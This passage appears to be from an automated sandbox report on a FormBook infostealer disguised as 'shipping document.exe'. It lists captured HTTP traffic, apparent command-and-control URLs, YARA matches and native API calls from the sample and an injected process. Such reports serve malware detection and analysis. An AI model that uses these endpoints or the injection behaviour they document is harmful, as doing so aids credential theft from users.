80</address></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 05:28:01 GMTServer: Apache/2.2.15 (CentOS)Content-Length: 289Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 33 67 39 37 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 65 76 65 6c 73 74 65 70 2e 6f 6e 6c 69 6e 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3g97/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.levelstep.online Port 80</address></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 05:28:04 GMTServer: Apache/2.2.15 (CentOS)Content-Length: 289Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 33 67 39 37 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 65 76 65 6c 73 74 65 70 2e 6f 6e 6c 69 6e 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3g97/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.levelstep.online Port 80</address></body></html>
              Source: openfiles.exe, 00000007.00000002.4111642073.00000000054B6000.00000004.10000000.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4111122090.00000000038B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://a-two-spa-salon.com/3g97/?12l42=14Ldh71M1tAlq614
              Source: openfiles.exe, 00000007.00000002.4111642073.0000000006146000.00000004.10000000.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4111122090.0000000004546000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://browsehappy.com/
              Source: openfiles.exe, 00000007.00000002.4111642073.0000000005AFE000.00000004.10000000.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4111122090.0000000003EFE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://fedoraproject.org/
              Source: firefox.exe, 00000009.00000002.2317219344.0000000019494000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://hostname.domain.tld/
              Source: openfiles.exe, 00000007.00000002.4111642073.0000000005AFE000.00000004.10000000.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4111122090.0000000003EFE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://nginx.net/
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
              Source: shipping document.exe, 00000000.00000002.1681640369.0000000006410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com8
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
              Source: oWRaEnEJAq.exe, 00000008.00000002.4113195669.00000000057BE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tondex.finance
              Source: oWRaEnEJAq.exe, 00000008.00000002.4113195669.00000000057BE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tondex.finance/3g97/
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
              Source: openfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: openfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: openfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: openfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: openfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: openfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: openfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: shipping document.exeString found in binary or memory: https://github.com/Deathmax/Chest-Control/raw/master/version.txt
              Source: openfiles.exe, 00000007.00000002.4111642073.000000000646A000.00000004.10000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4113701461.00000000078B0000.00000004.00000800.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4111122090.000000000486A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://img.sedoparking.com/templates/images/hero_nc.svg
              Source: openfiles.exe, 00000007.00000002.4110059356.0000000002AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: openfiles.exe, 00000007.00000002.4110059356.0000000002AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
              Source: openfiles.exe, 00000007.00000002.4110059356.0000000002AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: openfiles.exe, 00000007.00000002.4110059356.0000000002AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
              Source: openfiles.exe, 00000007.00000002.4110059356.0000000002AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
              Source: openfiles.exe, 00000007.00000003.2209406963.0000000007BA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
              Source: openfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: openfiles.exe, 00000007.00000002.4111642073.000000000646A000.00000004.10000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4113701461.00000000078B0000.00000004.00000800.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4111122090.000000000486A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.namecheap.com/domains/registration/results/?domain=brothedboil.com
              Source: oWRaEnEJAq.exe, 00000008.00000002.4111122090.000000000486A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
              Source: oWRaEnEJAq.exe, 00000008.00000002.4111122090.0000000004090000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.strato.de

              E-Banking Fraud

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 2.2.shipping document.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.shipping document.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000007.00000002.4110883708.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.4113195669.0000000005770000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2034898129.0000000002530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.4110925188.0000000004700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2034731642.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 2.2.shipping document.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 2.2.shipping document.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000007.00000002.4110883708.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000008.00000002.4113195669.0000000005770000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000002.00000002.2034898129.0000000002530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000007.00000002.4110925188.0000000004700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000002.00000002.2034731642.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Initial sample is a PE file and has a suspicious name
              Source: initial sampleStatic PE information: Filename: shipping document.exe
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0042B113 NtClose,2_2_0042B113
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2B60 NtClose,LdrInitializeThunk,2_2_017A2B60
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_017A2DF0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_017A2C70
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A35C0 NtCreateMutant,LdrInitializeThunk,2_2_017A35C0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A4340 NtSetContextThread,2_2_017A4340
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A4650 NtSuspendThread,2_2_017A4650
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2BF0 NtAllocateVirtualMemory,2_2_017A2BF0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2BE0 NtQueryValueKey,2_2_017A2BE0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2BA0 NtEnumerateValueKey,2_2_017A2BA0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2B80 NtQueryInformationFile,2_2_017A2B80
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2AF0 NtWriteFile,2_2_017A2AF0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2AD0 NtReadFile,2_2_017A2AD0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2AB0 NtWaitForSingleObject,2_2_017A2AB0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2D30 NtUnmapViewOfSection,2_2_017A2D30
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2D10 NtMapViewOfSection,2_2_017A2D10
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2D00 NtSetInformationFile,2_2_017A2D00
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2DD0 NtDelayExecution,2_2_017A2DD0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2DB0 NtEnumerateKey,2_2_017A2DB0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2C60 NtCreateKey,2_2_017A2C60
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2C00 NtQueryInformationProcess,2_2_017A2C00
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2CF0 NtOpenProcess,2_2_017A2CF0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2CC0 NtQueryVirtualMemory,2_2_017A2CC0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2CA0 NtQueryInformationToken,2_2_017A2CA0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2F60 NtCreateProcessEx,2_2_017A2F60
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2F30 NtCreateSection,2_2_017A2F30
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2FE0 NtCreateFile,2_2_017A2FE0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2FB0 NtResumeThread,2_2_017A2FB0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2FA0 NtQuerySection,2_2_017A2FA0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2F90 NtProtectVirtualMemory,2_2_017A2F90
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2E30 NtWriteVirtualMemory,2_2_017A2E30
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2EE0 NtQueueApcThread,2_2_017A2EE0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2EA0 NtAdjustPrivilegesToken,2_2_017A2EA0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2E80 NtReadVirtualMemory,2_2_017A2E80
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A3010 NtOpenDirectoryObject,2_2_017A3010
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A3090 NtSetValueKey,2_2_017A3090
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A39B0 NtGetContextThread,2_2_017A39B0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A3D70 NtOpenThread,2_2_017A3D70
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A3D10 NtOpenProcessToken,2_2_017A3D10
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E4650 NtSuspendThread,LdrInitializeThunk,7_2_048E4650
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E4340 NtSetContextThread,LdrInitializeThunk,7_2_048E4340
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E2CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_048E2CA0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E2C60 NtCreateKey,LdrInitializeThunk,7_2_048E2C60
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_048E2C70
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E2DD0 NtDelayExecution,LdrInitializeThunk,7_2_048E2DD0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_048E2DF0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E2D10 NtMapViewOfSection,LdrInitializeThunk,7_2_048E2D10
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E2D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_048E2D30
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E2E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_048E2E80
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E2EE0 NtQueueApcThread,LdrInitializeThunk,7_2_048E2EE0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E2FB0 NtResumeThread,LdrInitializeThunk,7_2_048E2FB0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E2FE0 NtCreateFile,LdrInitializeThunk,7_2_048E2FE0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E2F30 NtCreateSection,LdrInitializeThunk,7_2_048E2F30
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E2AD0 NtReadFile,LdrInitializeThunk,7_2_048E2AD0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E2AF0 NtWriteFile,LdrInitializeThunk,7_2_048E2AF0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E2BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_048E2BA0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E2BE0 NtQueryValueKey,LdrInitializeThunk,7_2_048E2BE0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_048E2BF0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E2B60 NtClose,LdrInitializeThunk,7_2_048E2B60
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E35C0 NtCreateMutant,LdrInitializeThunk,7_2_048E35C0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E39B0 NtGetContextThread,LdrInitializeThunk,7_2_048E39B0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E2CC0 NtQueryVirtualMemory,7_2_048E2CC0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E2CF0 NtOpenProcess,7_2_048E2CF0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E2C00 NtQueryInformationProcess,7_2_048E2C00
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E2DB0 NtEnumerateKey,7_2_048E2DB0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E2D00 NtSetInformationFile,7_2_048E2D00
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E2EA0 NtAdjustPrivilegesToken,7_2_048E2EA0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E2E30 NtWriteVirtualMemory,7_2_048E2E30
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E2F90 NtProtectVirtualMemory,7_2_048E2F90
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E2FA0 NtQuerySection,7_2_048E2FA0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E2F60 NtCreateProcessEx,7_2_048E2F60
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E2AB0 NtWaitForSingleObject,7_2_048E2AB0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E2B80 NtQueryInformationFile,7_2_048E2B80
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E3090 NtSetValueKey,7_2_048E3090
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E3010 NtOpenDirectoryObject,7_2_048E3010
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E3D10 NtOpenProcessToken,7_2_048E3D10
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E3D70 NtOpenThread,7_2_048E3D70
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_027B7AB0 NtDeleteFile,7_2_027B7AB0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_027B7B50 NtClose,7_2_027B7B50
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_027B7860 NtCreateFile,7_2_027B7860
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_027B79C0 NtReadFile,7_2_027B79C0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_027B7CA0 NtAllocateVirtualMemory,7_2_027B7CA0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 0_2_0315D51C0_2_0315D51C
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 0_2_07C58CB80_2_07C58CB8
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 0_2_07C5CBC00_2_07C5CBC0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 0_2_07C59B680_2_07C59B68
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 0_2_07C579C80_2_07C579C8
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 0_2_07C5C8A80_2_07C5C8A8
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 0_2_07C587180_2_07C58718
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 0_2_07C582500_2_07C58250
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 0_2_07C5F0F00_2_07C5F0F0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 0_2_07C500400_2_07C50040
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 0_2_07C500060_2_07C50006
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 0_2_07C56EB80_2_07C56EB8
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 0_2_07C5BE780_2_07C5BE78
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 0_2_07C5BC300_2_07C5BC30
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 0_2_07C5AA080_2_07C5AA08
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 0_2_07C5B8C00_2_07C5B8C0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 0_2_07C5D8500_2_07C5D850
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_004029202_2_00402920
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_004033502_2_00403350
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_004033072_2_00403307
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0040FBC32_2_0040FBC3
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0040FBBA2_2_0040FBBA
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_004024D02_2_004024D0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_004165632_2_00416563
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0042D5732_2_0042D573
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0041651D2_2_0041651D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0040FDE32_2_0040FDE3
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0040DE632_2_0040DE63
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_004046E42_2_004046E4
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_004026A02_2_004026A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_018241A22_2_018241A2
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017F81582_2_017F8158
